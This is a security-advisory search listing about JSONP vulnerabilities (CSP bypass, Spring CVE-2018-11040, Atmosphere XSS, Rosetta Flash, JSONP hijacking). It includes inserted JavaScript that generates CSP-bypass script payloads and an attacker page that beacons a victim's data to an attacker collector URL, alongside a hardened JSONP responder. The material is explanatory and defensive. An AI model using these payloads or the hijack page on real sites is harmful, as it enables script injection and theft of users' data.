456 matches found

Kitploit
Added 2019/10/25 8:00 p.m., 188 views

JSONBee - A Ready To Use JSONP Endpoints/Payloads To Help Bypass Content Security Policy Of Different Websites

A ready-to-use list of JSONP endpoints to help bypass the Content Security Policy of different websites. The tool was presented during HackIT 2018 in Kiev. The presentation can be found here (not sure why the format of the slides is screwed :D)...

AI score: 6.8
Exploits: 0, References: 1
OSV
Added 2019/06/27 5:25 p.m., 9 views

GHSA-28HP-FGCR-2R4H Cross-Site Scripting via JSONP

JSONP allows untrusted resource URLs, which provides a vector for attack by malicious actors...

AI score: 7.1
Exploits: 0, References: 2
Github Security Blog
Added 2019/06/27 5:25 p.m., 50 views

Cross-Site Scripting via JSONP

JSONP allows untrusted resource URLs, which provides a vector for attack by malicious actors...

AI score: 4.2
Exploits: 0, References: 3, Affected software: 1
Hacker One
Added 2019/01/20 5:37 a.m., 14 views

Mail.ru: JSONP hijacking

In this report the researcher bypassed the client-side protection against JSONP hijacking. The vulnerability allowed disclosing the e-mail addresses of logged-in my.com users who visited a malicious site...

AI score: 2.9
Exploits: 0
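The JSONBee entry above and the Mail.ru hijacking report both come down to the same browser behaviour: a `<script src>` tag is exempt from the same-origin policy, sends the victim's cookies, and executes whatever the JSONP endpoint returns. The following is an added example written for this page, not JSONBee's code and not the Mail.ru report's proof of concept. It takes a page's Content-Security-Policy header, checks (with a simplified version of CSP source-expression matching) which known JSONP endpoints sit on whitelisted script origins, and builds the `<script>` payloads an attacker would try; a second function builds the attacker page for a plain JSONP hijack. Every hostname, the endpoint list and the `exfilUrl` are constructed for the example (reserved `.test` TLD); JSONBee ships a real endpoint list.

```javascript
// Added example (not JSONBee's own code). Constructed sample of JSONP endpoints
// whose callback parameter is reflected unvalidated; JSONBee maintains a real list.
const KNOWN_JSONP_ENDPOINTS = [
  'https://static.example-cdn.test/widgets/jsonp?callback=',
  'https://api.example.test/v1/search?q=x&jsonp=',
  'https://other.test/cb?callback=',
];

// Source list that governs <script> loads: script-src, else default-src.
function scriptSources(csp) {
  const directives = new Map();
  for (const part of csp.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives.set(tokens[0].toLowerCase(), tokens.slice(1));
  }
  return directives.get('script-src') || directives.get('default-src') || [];
}

// Simplified CSP source-expression matching: 'self', scheme-source (https:),
// host-source with optional scheme, "*." wildcard host, port and path prefix.
// Keyword sources, nonces and hashes never match a URL.
function sourceMatches(expr, url, pageOrigin) {
  const e = expr.toLowerCase();
  if (e === "'self'") return url.origin === pageOrigin;
  if (e.startsWith("'")) return false;
  if (/^[a-z][a-z0-9+.-]*:$/.test(e)) return url.protocol === e;
  const m = e.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)(?::(\d+|\*))?(\/[^?#]*)?$/);
  if (!m) return false;
  const [, scheme, host, port, path] = m;
  // CSP lets an http: source also match https: (scheme upgrade).
  if (scheme && scheme + ':' !== url.protocol && !(scheme === 'http' && url.protocol === 'https:')) return false;
  if (host === '*') { /* any host */ }
  else if (host.startsWith('*.')) { if (!url.hostname.endsWith(host.slice(1))) return false; } // subdomains only
  else if (url.hostname !== host) return false;
  const urlPort = url.port || (url.protocol === 'https:' ? '443' : '80');
  if (port === undefined) { if (url.port !== '') return false; } // default port only
  else if (port !== '*' && port !== urlPort) return false;
  if (path) {
    if (path.endsWith('/')) { if (!url.pathname.startsWith(path)) return false; }
    else if (url.pathname !== path) return false;
  }
  return true;
}

function scriptAllowedByCsp(csp, scriptUrl, pageOrigin) {
  const url = new URL(scriptUrl);
  return scriptSources(csp).some(src => sourceMatches(src, url, pageOrigin));
}

// CSP bypass candidates: the JavaScript goes into the callback parameter and the
// trailing "//" comments out the JSON the endpoint appends, so the response body
// becomes "alert(document.domain)//({...})". Each candidate still has to be
// confirmed against the live endpoint, which may validate the callback.
function cspBypassCandidates(csp, pageOrigin, js, endpoints = KNOWN_JSONP_ENDPOINTS) {
  const cb = encodeURIComponent(js + '//');
  return endpoints
    .filter(ep => scriptAllowedByCsp(csp, ep, pageOrigin))
    .map(ep => `<script src="${ep}${cb}"></script>`);
}

// JSONP hijacking: the attacker page defines the callback itself and includes the
// victim's JSONP URL. The browser attaches the victim's cookies to the <script>
// request, so the response hands the logged-in user's data to the attacker's
// function. exfilUrl is a constructed attacker-controlled collector.
function jsonpHijackPage(endpoint, callbackName, exfilUrl) {
  return [
    '<script>',
    `window[${JSON.stringify(callbackName)}] = function (data) {`,
    `  navigator.sendBeacon(${JSON.stringify(exfilUrl)}, JSON.stringify(data));`,
    '};',
    '</script>',
    `<script src="${endpoint}${encodeURIComponent(callbackName)}"></script>`,
  ].join('\n');
}
```

The matcher implements the parts of CSP host-source matching that matter for this check (wildcard hosts match subdomains only, a path ending in `/` is a prefix, a non-default port must be listed); it does not model `strict-dynamic`, report-only policies or multiple CSP headers, so treat its output as a candidate list to verify, not a verdict.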
Github Security Blog
Added 2018/10/18 5:41 p.m., 18 views

OrientDB-Server vulnerable to Cross-Site Request Forgery

The JSONP endpoint in the Studio component in OrientDB Server Community Edition before 2.0.15 and 2.1.x before 2.1.1 does not properly restrict callback values, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks, and obtain sensitive information, via a crafted HTTP...

CVSS: 8.8, AI score: 8.1, EPSS: 0.00214
Exploits: 0, References: 4, Affected software: 1
RedhatCVE
Added 2018/10/17 4:50 a.m., 63 views

CVE-2018-11040

Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser...

CVSS: 7.5, AI score: 2.2, EPSS: 0.06564
Exploits: 0, References: 2
Github Security Blog
Added 2018/10/16 5:43 p.m., 43 views

Moderate severity vulnerability that affects org.springframework:spring-core

Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser...

CVSS: 7.5, AI score: 3.1, EPSS: 0.06564
Exploits: 0, References: 13, Affected software: 1
OSV
Added 2018/10/16 5:43 p.m., 34 views

GHSA-F26X-PR96-VW86 Moderate severity vulnerability that affects org.springframework:spring-core

Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser...

CVSS: 5.9, AI score: 8.3, EPSS: 0.06564
Exploits: 0, References: 14
Veracode
Added 2018/09/19 9:52 a.m., 10 views

Cross-site Scripting (XSS)

atmosphere-runtime is vulnerable to a cross-site scripting (XSS) attack. The library does not properly escape the JSONP callback parameter when passed to the server, allowing a malicious user to inject and execute arbitrary JavaScript through it...

AI score: 6.1
Exploits: 0
Veracode
Added 2018/08/24 1:50 a.m., 10 views

Rosetta Flash JSONP Vulnerability

WebApiContrib.Formatting.Jsonp is affected by the Rosetta Flash JSONP vulnerability. The WriteToStreamAsync function in JsonpMediaTypeFormatter.cs allows printable characters from the callback parameter but is not able to determine whether the parameter contains a Flash file. An attacker will be able to...

AI score: 6.5
Exploits: 0
Veracode
Added 2018/08/16 2:39 a.m., 7 views

Cross-Site Scripting (XSS)

atmosphere-runtime is vulnerable to cross-site scripting (XSS). The JSONP transport method does not specify the Content-Type header when responding with the JSONP callback parameter, which causes web browsers to render the response when the parameter contains HTML and JavaScript. This allows a remo...

AI score: 6.3
Exploits: 0
0day.today
Added 2018/08/16 12:00 a.m., 103 views

Atmosphere 1.x / 2.x Cross Site Scripting Vulnerability

Async-IO.org Atmosphere suffers from a cross site scripting vulnerability. Versions affected include 2.4.0 through 2.4.28, 2.3.0 through 2.3.9, 2.2.0 through 2.2.12, 2.1.0 through 2.1.13, 2.0.0 through 2.0.11, and 1.0.0 through 1.0.20. COMPASS SECURITY ADVISORY...

AI score: 6.6
Exploits: 0
Packet Storm
Added 2018/08/15 12:00 a.m., 37 views

Atmosphere 1.x / 2.x Cross Site Scripting

COMPASS SECURITY ADVISORY https://www.compass-security.com/research/advisories/
Product: Atmosphere 1
Vendor: Async-IO.org
CSNC ID: CSNC-2018-023
Subject: Reflected Cross-Site Scripting (XSS)
Risk: High
Effect: Remotely exploitable
Author: Lukasz D. [email protected]
Date: 13.08.2018...

Exploits: 0
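The OrientDB, Spring, atmosphere-runtime and WebApiContrib.Formatting.Jsonp entries above are four instances of one server-side mistake: a JSONP endpoint that reflects the `callback` parameter without restricting it, and often without declaring a content type. The following is an added example written for this page, not code from any of those projects or their fixes. It is a framework-free response builder that shows the unsafe pattern next to a hardened one addressing each issue the advisories name: callback injection (XSS), a response that can double as a Flash file (Rosetta Flash), a missing `Content-Type`, and cross-origin readability of user-bound data (JSONP hijacking). The `query`/`opts` shape and the `sessionToken` option are assumptions for the example; plug the returned `{status, headers, body}` into whatever server you use.

```javascript
// Added example (not the code of Spring, Atmosphere, OrientDB or
// WebApiContrib.Formatting.Jsonp). A JSONP response builder: the unsafe pattern
// the advisories describe next to a hardened replacement.

// Strict JavaScript identifier or dotted path, e.g. "jQuery21_1595000000000" or
// "app.cb". Parentheses, quotes, "<", "/" and whitespace are rejected, so the
// callback can only ever be a function reference, never a statement.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;
const CALLBACK_MAX = 128;

function reply(status, contentType, body) {
  return {
    status,
    headers: { 'Content-Type': contentType, 'X-Content-Type-Options': 'nosniff' },
    body,
  };
}

// Unsafe: the callback is reflected untouched and no content type is set (the
// atmosphere-runtime / OrientDB pattern). callback="alert(1)//" yields executable
// JavaScript that comments out the JSON; callback="<script>..." is rendered as
// HTML when the URL is opened directly because the browser sniffs the body.
function vulnerableJsonp(query, data) {
  return { status: 200, headers: {}, body: `${query.callback}(${JSON.stringify(data)});` };
}

// Hardened:
//  1. JSONP is readable by any origin by design, so user-bound data must not go
//     out through it unless the request carries an unguessable per-session token
//     (JSONP hijacking). The sessionToken option is a constructed stand-in for
//     however the application derives that token.
//  2. The callback must be a plain identifier path (callback XSS).
//  3. The body starts with "/**/" so it can never begin with the "CWS"/"FWS" SWF
//     magic bytes (Rosetta Flash), and it is served as JavaScript with nosniff.
//  4. U+2028/U+2029 are legal inside JSON strings but terminate JavaScript lines;
//     escaping them keeps the output a single valid statement.
function hardenedJsonp(query, data, opts = {}) {
  if (opts.sessionToken !== undefined && query.token !== opts.sessionToken) {
    return reply(403, 'text/plain; charset=utf-8', 'JSONP access to user data requires a valid token');
  }
  const cb = query.callback;
  if (typeof cb !== 'string' || cb.length > CALLBACK_MAX || !CALLBACK_RE.test(cb)) {
    return reply(400, 'text/plain; charset=utf-8', 'invalid JSONP callback');
  }
  const json = JSON.stringify(data)
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
  return reply(200, 'application/javascript; charset=utf-8', `/**/ ${cb}(${json});`);
}
```

Note what the identifier check does not do: `CWSxyz` is a perfectly valid identifier, which is exactly why the Rosetta Flash fix is the `/**/` prefix (the response must not start with the SWF magic) and not stricter callback filtering. Conversely, no amount of callback validation stops a third-party page from reading the data, so the token check (or simply not serving per-user data over JSONP and using CORS instead) is the only answer to the hijacking class.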
VulnCheck KEV
Added 2018/07/13 12:00 a.m., 1 view

VulnCheck KEV: CVE-2017-8877

ASUS RT-AC and RT-N devices with firmware through 3.0.0.4.380.7378 allow JSONP Information Disclosure such as the SSID...

CVSS: 6.5, AI score: 6.6, EPSS: 0.00259
Exploits: 0, References: 1
OSV
Added 2018/06/25 3:29 p.m., 2 views

DEBIAN-CVE-2018-11040

Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser...

CVSS: 7.5, AI score: 8.8, EPSS: 0.06564
Exploits: 0, References: 1
Prion
Added 2018/06/25 3:29 p.m., 43 views

Cross site scripting

Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser...

CVSS: 4.3, AI score: 8.3, EPSS: 0.06564
Exploits: 0, References: 9, Affected software: 28
OSV
Added 2018/06/25 3:29 p.m., 0 views

UBUNTU-CVE-2018-11040

Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser...

CVSS: 7.5, AI score: 6.7, EPSS: 0.06564
Exploits: 0, References: 3
OSV
Added 2018/06/25 3:29 p.m., 30 views

CVE-2018-11040

Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser...

CVSS: 7.5, AI score: 7.7, EPSS: 0.06564
Exploits: 0, References: 9
UbuntuCve
Added 2018/06/25 3:29 p.m., 30 views

CVE-2018-11040

Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser...

CVSS: 7.5, AI score: 6.8, EPSS: 0.06564
Exploits: 0, References: 2
NVD
Added 2018/06/25 3:29 p.m., 20 views

CVE-2018-11040

Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser...

CVSS: 7.5, AI score: 7.9, EPSS: 0.06564
Exploits: 0, References: 9